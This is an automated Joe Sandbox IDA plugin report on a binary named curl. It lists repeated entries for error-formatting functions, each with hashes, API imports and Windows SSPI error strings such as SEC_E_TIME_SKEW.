Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_KERB_KEY
API String ID: 1435330505-1707302738
Opcode ID: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction ID: ec8bb1a2b088f02e9966bc57921a067605f9537fe5796378de0427e734ad7286
Opcode Fuzzy Hash: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction Fuzzy Hash: FC115A31B14B4086E6619F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EDF5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_NO_PA_DATA, xrefs: 000000013F49EDF5
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_PA_DATA
API String ID: 1435330505-2211492245
Opcode ID: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction ID: d63edbe995dd50a54261cabc07f160d58791c967e85e94faa65e255953baa067
Opcode Fuzzy Hash: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction Fuzzy Hash: E7115A31B14B4086E6619F20E4047DF7365FB88B91F81413AEA8A42B96DF3CCA4BC710

Function 000000013F49EE0D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_NO_TGT_REPLY, xrefs: 000000013F49EE0D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_TGT_REPLY
API String ID: 1435330505-2640736245
Opcode ID: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction ID: 92f1a56e564f51e35f6a4f0aac2d56af2ee242b9263ed9d0912d38797dcc9375
Opcode Fuzzy Hash: 5cce48d33509d81210e853d872af67352e315a3b75540eba7f338ed2bef99aeb
Instruction Fuzzy Hash: A6115A35B14B4086E6619F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EE01 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 000000013F49EE01
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_S4U_PROT_SUPPORT
API String ID: 1435330505-839832400
Opcode ID: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction ID: a9fd7d696ae80acf331ed7c1e1daf5c1af7e8fa338deb82799a1666e0a6393c2
Opcode Fuzzy Hash: 1a61c974587919529a56b9ba9e972241c3deb2df1046477ba5706b0306396755
Instruction Fuzzy Hash: 5E115A31B14B4086E6A19F20E4047DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EE19 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_OUT_OF_SEQUENCE, xrefs: 000000013F49EE19

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_OUT_OF_SEQUENCE
API String ID: 1435330505-3748170351
Opcode ID: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction ID: 12a9ff2df35c6592207dd80241d5439ad23ab6d34f40449cc1a4d1448ef63e62
Opcode Fuzzy Hash: 97b03c64a3621921bd8a0e35a025e05ffb63e5522aa64c2c152ae1966e264eb6
Instruction Fuzzy Hash: EB115A31B14B4086E6619F20E4047DF7365FB88B51F81413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEA9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 000000013F49EEA9
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_LOGON_REQUIRED
API String ID: 1435330505-530148132
Opcode ID: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction ID: 8bacb75416c672c1d1e132c6b883cad9d668b84c86a914c80e3c6786a8b43bd2
Opcode Fuzzy Hash: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction Fuzzy Hash: 17112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEB5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 000000013F49EEB5

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
API String ID: 1435330505-2827815589
Opcode ID: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction ID: baf2383da6c6e9e204615379e5d708aeefeb8eb8c32b3a7a75da38ad0d1a8efc
Opcode Fuzzy Hash: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction Fuzzy Hash: 03112A35B14B40D6E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EECD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_TIME_SKEW, xrefs: 000000013F49EECD

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TIME_SKEW
API String ID: 1435330505-867874831
Opcode ID: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction ID: ba5e2dbbf7fb159d1e686e6ee488c070a2e4fcac98b98aa9dd0a1043c924cf75
Opcode Fuzzy Hash: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction Fuzzy Hash: CD112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EEC1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_TARGET_UNKNOWN, xrefs: 000000013F49EEC1
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TARGET_UNKNOWN
API String ID: 1435330505-2019469157
Opcode ID: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction ID: a30341459b7b0614047e0a431f44172a33d804d1d912c582d0c4f429da8dd333
Opcode Fuzzy Hash: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction Fuzzy Hash: 85112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49EED9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_TOO_MANY_PRINCIPALS, xrefs: 000000013F49EED9

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TOO_MANY_PRINCIPALS
API String ID: 1435330505-1024473768
Opcode ID: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction ID: aea3635bd6583033ed67e7e51180a0c706c5dfe0f9f13e7dfa24e0fb2121bbae
Opcode Fuzzy Hash: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction Fuzzy Hash: 1F115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EE6D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_SECPKG_NOT_FOUND, xrefs: 000000013F49EE6D
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECPKG_NOT_FOUND
API String ID: 1435330505-2788034027
Opcode ID: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction ID: d575d05ecb871b9627daf967adc5f4aefbdcb5d3b5ec5fd03ebbead5882f31b4
Opcode Fuzzy Hash: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction Fuzzy Hash: E7112A35B14B4096E6A19F20E4047DF7365FB88B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EE61 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 000000013F49EE61

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_KDC
API String ID: 1435330505-3944752561
Opcode ID: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction ID: 8688e9f93db1fcd48597647f9e7684da09d79c91b37184fe9751807010387c71
Opcode Fuzzy Hash: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction Fuzzy Hash: AC112A35B14B4096E6619F20E4047DF7365FB88B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49EE79 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_SECURITY_QOS_FAILED, xrefs: 000000013F49EE79

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
